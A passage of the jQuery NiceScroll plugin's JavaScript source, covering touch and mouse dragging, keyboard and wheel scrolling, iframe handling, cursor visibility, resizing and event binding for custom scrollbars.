(maxh>0) ? "v" : false;                   else if (self.rail.scrollable&&!self.railh.scrollable) self.rail.drag.ck = (maxw>0) ? "h" : false;                   else self.rail.drag.ck = false;                   if (!self.rail.drag.ck) self.rail.drag.dl = "f";                 }                                  if (self.opt.touchbehavior&&self.isiframe&&cap.isie) {                   var wp = self.win.position();                   self.rail.drag.x+=wp.left;                   self.rail.drag.y+=wp.top;                 }                                  self.hasmoving = false;                 self.lastmouseup = false;                 self.scrollmom.reset(e.clientX,e.clientY);                 if (!cap.cantouch&&!this.istouchcapable&&!cap.hasmstouch) {                                      var ip = (tg)?/INPUT|SELECT|TEXTAREA/i.test(tg.nodeName):false;                   if (!ip) {                     if (!self.ispage&&cap.hasmousecapture) tg.setCapture();                     return self.cancelEvent(e);                   }                   if (/SUBMIT|CANCEL|BUTTON/i.test($(tg).attr('type'))) {                     pc = {"tg":tg,"click":false};                     self.preventclick = pc;                   }                                    }               }                            };                          self.ontouchend = function(e) {               if (e.pointerType&&e.pointerType!=2) return false;               if (self.rail.drag&&(self.rail.drag.pt==2)) {                 self.scrollmom.doMomentum();                 self.rail.drag = false;                 if (self.hasmoving) {                   self.hasmoving = false;                   self.lastmouseup = true;                   self.hideCursor();                   if (cap.hasmousecapture) document.releaseCapture();                   if (!cap.cantouch) return self.cancelEvent(e);                 }                                           }                                                    };                          var moveneedoffset = (self.opt.touchbehavior&&self.isiframe&&!cap.hasmousecapture);                          self.ontouchmove = function(e,byiframe) {                              if (e.pointerType&&e.pointerType!=2) return false;                    if (self.rail.drag&&(self.rail.drag.pt==2)) {                 if (cap.cantouch&&(typeof e.original == "undefined")) return true;  // prevent ios "ghost" events by clickable elements                                self.hasmoving = true;                  if (self.preventclick&&!self.preventclick.click) {                   self.preventclick.click = self.preventclick.tg.onclick||false;                                   self.preventclick.tg.onclick = self.onpreventclick;                 }                  var ev = $.extend({"original":e},e);                 e = ev;                                  if (("changedTouches" in e)) {                   e.clientX = e.changedTouches[0].clientX;                   e.clientY = e.changedTouches[0].clientY;                 }                                                  if (self.forcescreen) {                   var le = e;                   var e = {"original":(e.original)?e.original:e};                   e.clientX = le.screenX;                   e.clientY = le.screenY;                       }                                  var ofx = ofy = 0;                                  if (moveneedoffset&&!byiframe) {                   var wp = self.win.position();                   ofx=-wp.left;                   ofy=-wp.top;                 }                                                  var fy = e.clientY + ofy;                 var my = (fy-self.rail.drag.y);                 var fx = e.clientX + ofx;                 var mx = (fx-self.rail.drag.x);                                  var ny = self.rail.drag.st-my;                                  if (self.ishwscroll&&self.opt.bouncescroll) {                   if (ny<0) {                     ny = Math.round(ny/2); //                    fy = 0;                   }                   else if (ny>self.page.maxh) {                     ny = self.page.maxh+Math.round((ny-self.page.maxh)/2); //                    fy = 0;                   }                 } else {                   if (ny<0) {ny=0;fy=0}                   if (ny>self.page.maxh) {ny=self.page.maxh;fy=0}                 }                                    if (self.railh&&self.railh.scrollable) {                   var nx = self.rail.drag.sl-mx;                                      if (self.ishwscroll&&self.opt.bouncescroll) {                                       if (nx<0) {                       nx = Math.round(nx/2); //                      fx = 0;                     }                     else if (nx>self.page.maxw) {                       nx = self.page.maxw+Math.round((nx-self.page.maxw)/2); //                      fx = 0;                     }                   } else {                     if (nx<0) {nx=0;fx=0}                     if (nx>self.page.maxw) {nx=self.page.maxw;fx=0}                   }                                  }                                  var grabbed = false;                 if (self.rail.drag.dl) {                   grabbed = true;                   if (self.rail.drag.dl=="v") nx = self.rail.drag.sl;                   else if (self.rail.drag.dl=="h") ny = self.rail.drag.st;                                   } else {                   var ay = Math.abs(my);                   var ax = Math.abs(mx);                   var dz = self.opt.directionlockdeadzone;                   if (self.rail.drag.ck=="v") {                         if (ay>dz&&(ax<=(ay*0.3))) {                       self.rail.drag = false;                                             return true;                     }                     else if (ax>dz) {                       self.rail.drag.dl="f";                                             $("body").scrollTop($("body").scrollTop());  // stop iOS native scrolling (when active javascript has blocked)                     }                   }                   else if (self.rail.drag.ck=="h") {                     if (ax>dz&&(ay<=(az*0.3))) {                       self.rail.drag = false;                                             return true;                     }                     else if (ay>dz) {                                             self.rail.drag.dl="f";                       $("body").scrollLeft($("body").scrollLeft());  // stop iOS native scrolling (when active javascript has blocked)                     }                   }                   }                                  self.synched("touchmove",function(){                   if (self.rail.drag&&(self.rail.drag.pt==2)) {                     if (self.prepareTransition) self.prepareTransition(0);                     if (self.rail.scrollable) self.setScrollTop(ny);                     self.scrollmom.update(fx,fy);                     if (self.railh&&self.railh.scrollable) {                       self.setScrollLeft(nx);                       self.showCursor(ny,nx);                     } else {                       self.showCursor(ny);                     }                     if (cap.isie10) document.selection.clear();                   }                 });                                  if (cap.ischrome&&self.istouchcapable) grabbed=false;  //chrome touch emulation doesn't like!                 if (grabbed) return self.cancelEvent(e);               }                            };                      }                      self.onmousedown = function(e,hronly) {                 if (self.rail.drag&&self.rail.drag.pt!=1) return;             if (self.locked) return self.cancelEvent(e);                         self.cancelScroll();                           self.rail.drag = {x:e.clientX,y:e.clientY,sx:self.scroll.x,sy:self.scroll.y,pt:1,hr:(!!hronly)};             var tg = self.getTarget(e);             if (!self.ispage&&cap.hasmousecapture) tg.setCapture();             if (self.isiframe&&!cap.hasmousecapture) {               self.saved["csspointerevents"] = self.doc.css("pointer-events");               self.css(self.doc,{"pointer-events":"none"});             }             return self.cancelEvent(e);           };                      self.onmouseup = function(e) {             if (self.rail.drag) {               if (cap.hasmousecapture) document.releaseCapture();               if (self.isiframe&&!cap.hasmousecapture) self.doc.css("pointer-events",self.saved["csspointerevents"]);               if(self.rail.drag.pt!=1)return;               self.rail.drag = false;               //if (!self.rail.active) self.hideCursor();               return self.cancelEvent(e);             }           };                              self.onmousemove = function(e) {             if (self.rail.drag) {               if(self.rail.drag.pt!=1)return;                              if (cap.ischrome&&e.which==0) return self.onmouseup(e);                              self.cursorfreezed = true;                                  if (self.rail.drag.hr) {                 self.scroll.x = self.rail.drag.sx + (e.clientX-self.rail.drag.x);                 if (self.scroll.x<0) self.scroll.x=0;                 var mw = self.scrollvaluemaxw;                 if (self.scroll.x>mw) self.scroll.x=mw;               } else {                                 self.scroll.y = self.rail.drag.sy + (e.clientY-self.rail.drag.y);                 if (self.scroll.y<0) self.scroll.y=0;                 var my = self.scrollvaluemax;                 if (self.scroll.y>my) self.scroll.y=my;               }                              self.synched('mousemove',function(){                 if (self.rail.drag&&(self.rail.drag.pt==1)) {                   self.showCursor();                   if (self.rail.drag.hr) self.doScrollLeft(Math.round(self.scroll.x*self.scrollratio.x),self.opt.cursordragspeed);                   else self.doScrollTop(Math.round(self.scroll.y*self.scrollratio.y),self.opt.cursordragspeed);                 }               });                              return self.cancelEvent(e);             }  /*                           else {               self.checkarea = true;             } */                         };                               if (cap.cantouch||self.opt.touchbehavior) {                        self.onpreventclick = function(e) {               if (self.preventclick) {                 self.preventclick.tg.onclick = self.preventclick.click;                 self.preventclick = false;                             return self.cancelEvent(e);               }             }            //            self.onmousedown = self.ontouchstart;             //            self.onmouseup = self.ontouchend; //            self.onmousemove = self.ontouchmove;              self.bind(self.win,"mousedown",self.ontouchstart);  // control content dragging              self.onclick = (cap.isios) ? false : function(e) {                if (self.lastmouseup) {                 self.lastmouseup = false;                 return self.cancelEvent(e);               } else {                 return true;               }             };                           if (self.opt.grabcursorenabled&&cap.cursorgrabvalue) {               self.css((self.ispage)?self.doc:self.win,{'cursor':cap.cursorgrabvalue});                           self.css(self.rail,{'cursor':cap.cursorgrabvalue});             }                        } else {              function checkSelectionScroll(e) {               if (!self.selectiondrag) return;                              if (e) {                 var ww = self.win.outerHeight();                 var df = (e.pageY - self.selectiondrag.top);                 if (df>0&&df<ww) df=0;                 if (df>=ww) df-=ww;                 self.selectiondrag.df = df;                               }               if (self.selectiondrag.df==0) return;                              var rt = -Math.floor(self.selectiondrag.df/6)*2;               //              self.doScrollTop(self.getScrollTop(true)+rt);               self.doScrollBy(rt);                              self.debounced("doselectionscroll",function(){checkSelectionScroll()},50);             }                          if ("getSelection" in document) {  // A grade - Major browsers               self.hasTextSelected = function() {                   return (document.getSelection().rangeCount>0);               }             }              else if ("selection" in document) {  //IE9-               self.hasTextSelected = function() {                 return (document.selection.type != "None");               }             }              else {               self.hasTextSelected = function() {  // no support                 return false;               }             }                                      self.onselectionstart = function(e) {               if (self.ispage) return;               self.selectiondrag = self.win.offset();             }             self.onselectionend = function(e) {               self.selectiondrag = false;             }             self.onselectiondrag = function(e) {                             if (!self.selectiondrag) return;               if (self.hasTextSelected()) self.debounced("selectionscroll",function(){checkSelectionScroll(e)},250);             }                                     }                      if (cap.hasmstouch) {             self.css(self.rail,{'-ms-touch-action':'none'});             self.css(self.cursor,{'-ms-touch-action':'none'});                          self.bind(self.win,"MSPointerDown",self.ontouchstart);             self.bind(document,"MSPointerUp",self.ontouchend);             self.bind(document,"MSPointerMove",self.ontouchmove);             self.bind(self.cursor,"MSGestureHold",function(e){e.preventDefault()});             self.bind(self.cursor,"contextmenu",function(e){e.preventDefault()});           }            if (this.istouchcapable) {  //desktop with screen touch enabled             self.bind(self.win,"touchstart",self.ontouchstart);             self.bind(document,"touchend",self.ontouchend);             self.bind(document,"touchcancel",self.ontouchend);             self.bind(document,"touchmove",self.ontouchmove);                       }                      self.bind(self.cursor,"mousedown",self.onmousedown);           self.bind(self.cursor,"mouseup",self.onmouseup);            if (self.railh) {             self.bind(self.cursorh,"mousedown",function(e){self.onmousedown(e,true)});             self.bind(self.cursorh,"mouseup",function(e){               if (self.rail.drag&&self.rail.drag.pt==2) return;               self.rail.drag = false;               self.hasmoving = false;               self.hideCursor();               if (cap.hasmousecapture) document.releaseCapture();               return self.cancelEvent(e);             });           } 		           if (self.opt.cursordragontouch||!cap.cantouch&&!self.opt.touchbehavior) {              self.rail.css({"cursor":"default"});             self.railh&&self.railh.css({"cursor":"default"});                                  self.jqbind(self.rail,"mouseenter",function() {               if (self.canshowonmouseevent) self.showCursor();               self.rail.active = true;             });             self.jqbind(self.rail,"mouseleave",function() {                self.rail.active = false;               if (!self.rail.drag) self.hideCursor();             });                          if (self.opt.sensitiverail) {               self.bind(self.rail,"click",function(e){self.doRailClick(e,false,false)});               self.bind(self.rail,"dblclick",function(e){self.doRailClick(e,true,false)});               self.bind(self.cursor,"click",function(e){self.cancelEvent(e)});               self.bind(self.cursor,"dblclick",function(e){self.cancelEvent(e)});             }              if (self.railh) {               self.jqbind(self.railh,"mouseenter",function() {                 if (self.canshowonmouseevent) self.showCursor();                 self.rail.active = true;               });                         self.jqbind(self.railh,"mouseleave",function() {                  self.rail.active = false;                 if (!self.rail.drag) self.hideCursor();               });                              if (self.opt.sensitiverail) {                 self.bind(self.railh, "click", function(e){self.doRailClick(e,false,true)});                 self.bind(self.railh, "dblclick", function(e){self.doRailClick(e, true, true) });                 self.bind(self.cursorh, "click", function (e) { self.cancelEvent(e) });                 self.bind(self.cursorh, "dblclick", function (e) { self.cancelEvent(e) });               }                            }                      }                if (!cap.cantouch&&!self.opt.touchbehavior) {              self.bind((cap.hasmousecapture)?self.win:document,"mouseup",self.onmouseup);                         self.bind(document,"mousemove",self.onmousemove);             if (self.onclick) self.bind(document,"click",self.onclick);                          if (!self.ispage&&self.opt.enablescrollonselection) {               self.bind(self.win[0],"mousedown",self.onselectionstart);               self.bind(document,"mouseup",self.onselectionend);               self.bind(self.cursor,"mouseup",self.onselectionend);               if (self.cursorh) self.bind(self.cursorh,"mouseup",self.onselectionend);               self.bind(document,"mousemove",self.onselectiondrag);             }  						if (self.zoom) { 							self.jqbind(self.zoom,"mouseenter",function() { 								if (self.canshowonmouseevent) self.showCursor(); 								self.rail.active = true; 							});           							self.jqbind(self.zoom,"mouseleave",function() {  								self.rail.active = false; 								if (!self.rail.drag) self.hideCursor(); 							}); 						}            } else {                          self.bind((cap.hasmousecapture)?self.win:document,"mouseup",self.ontouchend);             self.bind(document,"mousemove",self.ontouchmove);             if (self.onclick) self.bind(document,"click",self.onclick);                          if (self.opt.cursordragontouch) {               self.bind(self.cursor,"mousedown",self.onmousedown);               self.bind(self.cursor,"mousemove",self.onmousemove);               self.cursorh&&self.bind(self.cursorh,"mousedown",self.onmousedown);               self.cursorh&&self.bind(self.cursorh,"mousemove",self.onmousemove);             }                      } 						 					if (self.opt.enablemousewheel) { 						if (!self.isiframe) self.bind((cap.isie&&self.ispage) ? document : self.docscroll,"mousewheel",self.onmousewheel); 						self.bind(self.rail,"mousewheel",self.onmousewheel); 						if (self.railh) self.bind(self.railh,"mousewheel",self.onmousewheelhr); 					}						 						           if (!self.ispage&&!cap.cantouch&&!(/HTML|BODY/.test(self.win[0].nodeName))) {             if (!self.win.attr("tabindex")) self.win.attr({"tabindex":tabindexcounter++});                          self.jqbind(self.win,"focus",function(e) {               domfocus = (self.getTarget(e)).id||true;               self.hasfocus = true;               if (self.canshowonmouseevent) self.noticeCursor();             });             self.jqbind(self.win,"blur",function(e) {               domfocus = false;               self.hasfocus = false;             });                          self.jqbind(self.win,"mouseenter",function(e) {               mousefocus = (self.getTarget(e)).id||true;               self.hasmousefocus = true;               if (self.canshowonmouseevent) self.noticeCursor();             });             self.jqbind(self.win,"mouseleave",function() {               mousefocus = false;               self.hasmousefocus = false;             });                        };                    }  // !ie9mobile                  //Thanks to http://www.quirksmode.org !!         self.onkeypress = function(e) {           if (self.locked&&self.page.maxh==0) return true;                      e = (e) ? e : window.e;           var tg = self.getTarget(e);           if (tg&&/INPUT|TEXTAREA|SELECT|OPTION/.test(tg.nodeName)) {             var tp = tg.getAttribute('type')||tg.type||false;                         if ((!tp)||!(/submit|button|cancel/i.tp)) return true;           }                      if (self.hasfocus||(self.hasmousefocus&&!domfocus)||(self.ispage&&!domfocus&&!mousefocus)) {             var key = e.keyCode;                          if (self.locked&&key!=27) return self.cancelEvent(e);              var ctrl = e.ctrlKey||false;             var shift = e.shiftKey || false;                          var ret = false;             switch (key) {               case 38:               case 63233: //safari                 self.doScrollBy(24*3);                 ret = true;                 break;               case 40:               case 63235: //safari                 self.doScrollBy(-24*3);                 ret = true;                 break;               case 37:               case 63232: //safari                 if (self.railh) {                   (ctrl) ? self.doScrollLeft(0) : self.doScrollLeftBy(24*3);                   ret = true;                 }                 break;               case 39:               case 63234: //safari                 if (self.railh) {                   (ctrl) ? self.doScrollLeft(self.page.maxw) : self.doScrollLeftBy(-24*3);                   ret = true;                 }                 break;               case 33:               case 63276: // safari                 self.doScrollBy(self.view.h);                 ret = true;                 break;               case 34:               case 63277: // safari                 self.doScrollBy(-self.view.h);                 ret = true;                 break;               case 36:               case 63273: // safari                                 (self.railh&&ctrl) ? self.doScrollPos(0,0) : self.doScrollTo(0);                 ret = true;                 break;               case 35:               case 63275: // safari                 (self.railh&&ctrl) ? self.doScrollPos(self.page.maxw,self.page.maxh) : self.doScrollTo(self.page.maxh);                 ret = true;                 break;               case 32:                 if (self.opt.spacebarenabled) {                   (shift) ? self.doScrollBy(self.view.h) : self.doScrollBy(-self.view.h);                   ret = true;                 }                 break;               case 27: // ESC                 if (self.zoomactive) {                   self.doZoom();                   ret = true;                 }                 break;             }             if (ret) return self.cancelEvent(e);           }         };                  if (self.opt.enablekeyboard) self.bind(document,(cap.isopera&&!cap.isopera12)?"keypress":"keydown",self.onkeypress);                  self.bind(window,'resize',self.lazyResize);         self.bind(window,'orientationchange',self.lazyResize);                  self.bind(window,"load",self.lazyResize); 		         if (cap.ischrome&&!self.ispage&&!self.haswrapper) { //chrome void scrollbar bug - it persists in version 26           var tmp=self.win.attr("style"); 					var ww = parseFloat(self.win.css("width"))+1;           self.win.css('width',ww);           self.synched("chromefix",function(){self.win.attr("style",tmp)});         }                   // Trying a cross-browser implementation - good luck!          self.onAttributeChange = function(e) {           self.lazyResize(250);         }                  if (!self.ispage&&!self.haswrapper) {           // redesigned MutationObserver for Chrome18+/Firefox14+/iOS6+ with support for: remove div, add/remove content           if (clsMutationObserver !== false) {             self.observer = new clsMutationObserver(function(mutations) {                           mutations.forEach(self.onAttributeChange);             });             self.observer.observe(self.win[0],{childList: true, characterData: false, attributes: true, subtree: false});                          self.observerremover = new clsMutationObserver(function(mutations) {                mutations.forEach(function(mo){                  if (mo.removedNodes.length>0) {                    for (var dd in mo.removedNodes) {                      if (mo.removedNodes[dd]==self.win[0]) return self.remove();                    }                  }                });             });             self.observerremover.observe(self.win[0].parentNode,{childList: true, characterData: false, attributes: false, subtree: false});                        } else {                     self.bind(self.win,(cap.isie&&!cap.isie9)?"propertychange":"DOMAttrModified",self.onAttributeChange);                         if (cap.isie9) self.win[0].attachEvent("onpropertychange",self.onAttributeChange); //IE9 DOMAttrModified bug             self.bind(self.win,"DOMNodeRemoved",function(e){               if (e.target==self.win[0]) self.remove();             });           }         }          //          if (!self.ispage&&self.opt.boxzoom) self.bind(window,"resize",self.resizeZoom);         if (self.istextarea) self.bind(self.win,"mouseup",self.lazyResize);                  self.checkrtlmode = true;         self.lazyResize(30);                }              if (this.doc[0].nodeName == 'IFRAME') {         function oniframeload(e) {           self.iframexd = false;           try {             var doc = 'contentDocument' in this ? this.contentDocument : this.contentWindow.document;             var a = doc.domain;                       } catch(e){self.iframexd = true;doc=false};                      if (self.iframexd) {             if ("console" in window) console.log('NiceScroll error: policy restriced iframe');             return true;  //cross-domain - I can't manage this                   }                      self.forcescreen = true;                      if (self.isiframe) {                         self.iframe = {               "doc":$(doc),               "html":self.doc.contents().find('html')[0],               "body":self.doc.contents().find('body')[0]             };             self.getContentSize = function(){               return {                 w:Math.max(self.iframe.html.scrollWidth,self.iframe.body.scrollWidth),                 h:Math.max(self.iframe.html.scrollHeight,self.iframe.body.scrollHeight)               }             }                         self.docscroll = $(self.iframe.body);//$(this.contentWindow);           }                      if (!cap.isios&&self.opt.iframeautoresize&&!self.isiframe) {             self.win.scrollTop(0); // reset position             self.doc.height("");  //reset height to fix browser bug             var hh=Math.max(doc.getElementsByTagName('html')[0].scrollHeight,doc.body.scrollHeight);             self.doc.height(hh);                     }           self.lazyResize(30);                      if (cap.isie7) self.css($(self.iframe.html),{'overflow-y':'hidden'});           //self.css($(doc.body),{'overflow-y':'hidden'});           self.css($(self.iframe.body),{'overflow-y':'hidden'});                      if ('contentWindow' in this) {             self.bind(this.contentWindow,"scroll",self.onscroll);  //IE8 & minor           } else {                       self.bind(doc,"scroll",self.onscroll);           }                                          if (self.opt.enablemousewheel) {             self.bind(doc,"mousewheel",self.onmousewheel);           }                      if (self.opt.enablekeyboard) self.bind(doc,(cap.isopera)?"keypress":"keydown",self.onkeypress);                      if (cap.cantouch||self.opt.touchbehavior) {             self.bind(doc,"mousedown",self.onmousedown);             self.bind(doc,"mousemove",function(e){self.onmousemove(e,true)});             if (self.opt.grabcursorenabled&&cap.cursorgrabvalue) self.css($(doc.body),{'cursor':cap.cursorgrabvalue});           }                      self.bind(doc,"mouseup",self.onmouseup);                      if (self.zoom) {             if (self.opt.dblclickzoom) self.bind(doc,'dblclick',self.doZoom);             if (self.ongesturezoom) self.bind(doc,"gestureend",self.ongesturezoom);                        }         };                  if (this.doc[0].readyState&&this.doc[0].readyState=="complete"){           setTimeout(function(){oniframeload.call(self.doc[0],false)},500);         }         self.bind(this.doc,"load",oniframeload);                }            };          this.showCursor = function(py,px) {       if (self.cursortimeout) {         clearTimeout(self.cursortimeout);         self.cursortimeout = 0;       }       if (!self.rail) return;       if (self.autohidedom) {         self.autohidedom.stop().css({opacity:self.opt.cursoropacitymax});         self.cursoractive = true;       }              if (!self.rail.drag||self.rail.drag.pt!=1) {               if ((typeof py != "undefined")&&(py!==false)) {           self.scroll.y = Math.round(py * 1/self.scrollratio.y);         }         if (typeof px != "undefined") {           self.scroll.x = Math.round(px * 1/self.scrollratio.x);         }       }              self.cursor.css({height:self.cursorheight,top:self.scroll.y});        if (self.cursorh) {         (!self.rail.align&&self.rail.visibility) ? self.cursorh.css({width:self.cursorwidth,left:self.scroll.x+self.rail.width}) : self.cursorh.css({width:self.cursorwidth,left:self.scroll.x});         self.cursoractive = true;       }              if (self.zoom) self.zoom.stop().css({opacity:self.opt.cursoropacitymax});           };          this.hideCursor = function(tm) {       if (self.cursortimeout) return;       if (!self.rail) return;       if (!self.autohidedom) return;       self.cursortimeout = setTimeout(function() {          if (!self.rail.active||!self.showonmouseevent) {            self.autohidedom.stop().animate({opacity:self.opt.cursoropacitymin});            if (self.zoom) self.zoom.stop().animate({opacity:self.opt.cursoropacitymin});            self.cursoractive = false;          }          self.cursortimeout = 0;       },tm||self.opt.hidecursordelay);     };          this.noticeCursor = function(tm,py,px) {       self.showCursor(py,px);       if (!self.rail.active) self.hideCursor(tm);     };              this.getContentSize =        (self.ispage) ?         function(){           return {             w:Math.max(document.body.scrollWidth,document.documentElement.scrollWidth),             h:Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)           }         }       : (self.haswrapper) ?         function(){           return {             w:self.doc.outerWidth()+parseInt(self.win.css('paddingLeft'))+parseInt(self.win.css('paddingRight')),             h:self.doc.outerHeight()+parseInt(self.win.css('paddingTop'))+parseInt(self.win.css('paddingBottom'))           }         }       : function() {                 return {           w:self.docscroll[0].scrollWidth,           h:self.docscroll[0].scrollHeight         }       };        this.onResize = function(e,page) {      	  if (!self.win) return false; 	       if (!self.haswrapper&&!self.ispage) {         if (self.win.css('display')=='none') {           if (self.visibility) self.hideRail().hideRailHr();           return false;         } else {                     if (!self.hidden&&!self.visibility) self.showRail().showRailHr();         }               }            var premaxh = self.page.maxh;       var premaxw = self.page.maxw;        var preview = {h:self.view.h,w:self.view.w};                 self.view = {         w:(self.ispage) ? self.win.width() : parseInt(self.win[0].clientWidth),         h:(self.ispage) ? self.win.height() : parseInt(self.win[0].clientHeight)       };              self.page = (page) ? page : self.getContentSize();              self.page.maxh = Math.max(0,self.page.h - self.view.h);       self.page.maxw = Math.max(0,self.page.w - self.view.w);              if ((self.page.maxh==premaxh)&&(self.page.maxw==premaxw)&&(self.view.w==preview.w)) {         // test position                 if (!self.ispage) {           var pos = self.win.offset();           if (self.lastposition) {             var lst = self.lastposition;             if ((lst.top==pos.top)&&(lst.left==pos.left)) return self; //nothing to do                       }           self.lastposition = pos;         } else {           return self; //nothing to do         }       }              if (self.page.maxh==0) {         self.hideRail();                 self.scrollvaluemax = 0;         self.scroll.y = 0;         self.scrollratio.y = 0;         self.cursorheight = 0;         self.setScrollTop(0);         self.rail.scrollable = false;       } else {                self.rail.scrollable = true;       }              if (self.page.maxw==0) {         self.hideRailHr();         self.scrollvaluemaxw = 0;         self.scroll.x = 0;         self.scrollratio.x = 0;         self.cursorwidth = 0;         self.setScrollLeft(0);         self.railh.scrollable = false;       } else {                 self.railh.scrollable = true;       }          self.locked = (self.page.maxh==0)&&(self.page.maxw==0);       if (self.locked) { 				if (!self.ispage) self.updateScrollBar(self.view); 			  return false; 		  }        if (!self.hidden&&!self.visibility) {         self.showRail().showRailHr();       }             else if (!self.hidden&&!self.railh.visibility) self.showRailHr();              if (self.istextarea&&self.win.css('resize')&&self.win.css('resize')!='none') self.view.h-=20;              self.cursorheight = Math.min(self.view.h,Math.round(self.view.h * (self.view.h / self.page.h)));       self.cursorheight = (self.opt.cursorfixedheight) ? self.opt.cursorfixedheight : Math.max(self.opt.cursorminheight,self.cursorheight);        self.cursorwidth = Math.min(self.view.w,Math.round(self.view.w * (self.view.w / self.page.w)));       self.cursorwidth = (self.opt.cursorfixedheight) ? self.opt.cursorfixedheight : Math.max(self.opt.cursorminheight,self.cursorwidth);              self.scrollvaluemax = self.view.h-self.cursorheight-self.cursor.hborder;              if (self.railh) {         self.railh.width = (self.page.maxh>0) ? (self.view.w-self.rail.width) : self.view.w;         self.scrollvaluemaxw = self.railh.width-self.cursorwidth-self.cursorh.wborder;       }              if (self.checkrtlmode&&self.railh) {         self.checkrtlmode = false;         if (self.opt.rtlmode&&self.scroll.x==0) self.setScrollLeft(self.page.maxw);       }              if (!self.ispage) self.updateScrollBar(self.view);              self.scrollratio = {         x:(self.page.maxw/self.scrollvaluemaxw),         y:(self.page.maxh/self.scrollvaluemax)       };             var sy = self.getScrollTop();       if (sy>self.page.maxh) {         self.doScrollTop(self.page.maxh);       } else {              self.scroll.y = Math.round(self.getScrollTop() * (1/self.scrollratio.y));         self.scroll.x = Math.round(self.getScrollLeft() * (1/self.scrollratio.x));         if (self.cursoractive) self.noticeCursor();            }                    if (self.scroll.y&&(self.getScrollTop()==0)) self.doScrollTo(Math.floor(self.scroll.y*self.scrollratio.y));              return self;     };          this.resize = self.onResize;          this.lazyResize = function(tm) {   // event debounce       tm = (isNaN(tm)) ? 30 : tm;       self.delayed('resize',self.resize,tm);       return self;     }     // modified by MDN https://developer.mozilla.org/en-US/docs/DOM/Mozilla_event_reference/wheel     function _modernWheelEvent(dom,name,fn,bubble) {             self._bind(dom,name,function(e){         var  e = (e) ? e : window.event;         var event = {           original: e,           target: e.target || e.srcElement,           type: "wheel",           deltaMode: e.type == "MozMousePixelScroll" ? 0 : 1,           deltaX: 0,           deltaZ: 0,           preventDefault: function() {             e.preventDefault ? e.preventDefault() : e.returnValue = false;             return false;           },           stopImmediatePropagation: function() {             (e.stopImmediatePropagation) ? e.stopImmediatePropagation() : e.cancelBubble = true;           }         };                      if (name=="mousewheel") {           event.deltaY = - 1/40 * e.wheelDelta;           e.wheelDeltaX && (event.deltaX = - 1/40 * e.wheelDeltaX);         } else {           event.deltaY = e.detail;         }          return fn.call(dom,event);             },bubble);     };              this._bind = function(el,name,fn,bubble) {  // primitive bind       self.events.push({e:el,n:name,f:fn,b:bubble,q:false});       if (el.addEventListener) {         el.addEventListener(name,fn,bubble||false);       }       else if (el.attachEvent) {         el.attachEvent("on"+name,fn);       }       else {         el["on"+name] = fn;               }             };         this.jqbind = function(dom,name,fn) {  // use jquery bind for non-native events (mouseenter/mouseleave)       self.events.push({e:dom,n:name,f:fn,q:true});       $(dom).bind(name,fn);     }         this.bind = function(dom,name,fn,bubble) {  // touch-oriented & fixing jquery bind       var el = ("jquery" in dom) ? dom[0] : dom;              if (name=='mousewheel') {         if ("onwheel" in self.win) {                       self._bind(el,"wheel",fn,bubble||false);         } else {                       var wname = (typeof document.onmousewheel != "undefined") ? "mousewheel" : "DOMMouseScroll";  // older IE/Firefox           _modernWheelEvent(el,wname,fn,bubble||false);           if (wname=="DOMMouseScroll") _modernWheelEvent(el,"MozMousePixelScroll",fn,bubble||false);  // Firefox legacy         }       }        else if (el.addEventListener) {         if (cap.cantouch && /mouseup|mousedown|mousemove/.test(name)) {  // touch device support           var tt=(name=='mousedown')?'touchstart':(name=='mouseup')?'touchend':'touchmove';           self._bind(el,tt,function(e){             if (e.touches) {               if (e.touches.length<2) {var ev=(e.touches.length)?e.touches[0]:e;ev.original=e;fn.call(this,ev);}             }              else if (e.changedTouches) {var ev=e.changedTouches[0];ev.original=e;fn.call(this,ev);}  //blackberry           },bubble||false);         }         self._bind(el,name,fn,bubble||false);         if (cap.cantouch && name=="mouseup") self._bind(el,"touchcancel",fn,bubble||false);       }       else {         self._bind(el,name,function(e) {           e = e||window.event||false;           if (e) {             if (e.srcElement) e.target=e.srcElement;           }           if (!("pageY" in e)) {             e.pageX = e.clientX + document.documentElement.scrollLeft;             e.pageY = e.clientY + document.documentElement.scrollTop;            }           return ((fn.call(el,e)===false)||bubble===false) ? self.cancelEvent(e) : true;         });       }      };          this._unbind = function(el,name,fn,bub) {  // primitive unbind       if (el.removeEventListener) {         el.removeEventListener(name,fn,bub);       }       else if (el.detachEvent) {         el.detachEvent('on'+name,fn);       } else {         el['on'+name] = false;       }     };          this.unbindAll = function() {       for(var a=0;a<self.events.length;a++) {         var r = self.events[a];                 (r.q) ? r.e.unbind(r.n,r.f) : self._unbind(r.e,r.n,r.f,r.b);       }     };          // Thanks to http://www.switchonthecode.com !!     this.cancelEvent = function(e) {       var e = (e.original) ? e.original : (e) ? e : window.event||false;       if (!e) return false;             if(e.preventDefault) e.preventDefault();       if(e.stopPropagation) e.stopPropagation();       if(e.preventManipulation) e.preventManipulation();  //IE10       e.cancelBubble = true;       e.cancel = true;       e.returnValue = false;       return false;     };      this.stopPropagation = function(e) {       var e = (e.original) ? e.original : (e) ? e : window.event||false;       if (!e) return false;       if (e.stopPropagation) return e.stopPropagation();       if (e.cancelBubble) e.cancelBubble=true;       return false;     }          this.showRail = function() {       if ((self.page.maxh!=0)&&(self.ispage||self.win.css('display')!='none')) {         self.visibility = true;         self.rail.visibility = true;         self.rail.css('display','block');       }       return self;     };      this.showRailHr = function() {       if (!self.railh) return self;       if ((self.page.maxw!=0)&&(self.ispage||self.win.css('display')!='none')) {         self.railh.visibility = true;         self.railh.css('display','block');       }       return self;     };          this.hideRail = function() {       self.visibility = false;       self.rail.visibility = false;       self.rail.css('display','none');       return self;     };      this.hideRailHr = function() {       if (!self.railh) return self;       self.railh.visibility = false;       self.railh.css('display','none');       return self;     };          this.show = function() {       self.hidden = false;       self.locked = false;       return self.showRail().showRailHr();     };      this.hide = function() {       self.hidden = true;       self.locked = true;       return self.hideRail().hideRailHr();     };          this.toggle = function() {       return (self.hidden) ? self.show() : self.hide();     };          this.remove = function() {       self.stop();       if (self.cursortimeout) clearTimeout(self.cursortimeout);       self.doZoomOut();       self.unbindAll();             if (self.observer !== false) self.observer.disconnect();       if (self.observerremover !== false) self.observerremover.disconnect();             self.events = [];       if (self.cursor) {         self.cursor.remove();         self.cursor = null;       }       if (self.cursorh) {         self.cursorh.remove();         self.cursorh = null;       }       if (self.rail) {         self.rail.remove();         self.rail = null;       }       if (self.railh) {         self.railh.remove();         self.railh = null;       }       if (self.zoom) {         self.zoom.remove();         self.zoom = null;       }       for(var a=0;a<self.saved.css.length;a++) {         var d=self.saved.css[a];         d[0].css(d[1],(typeof d[2]=="undefined") ? 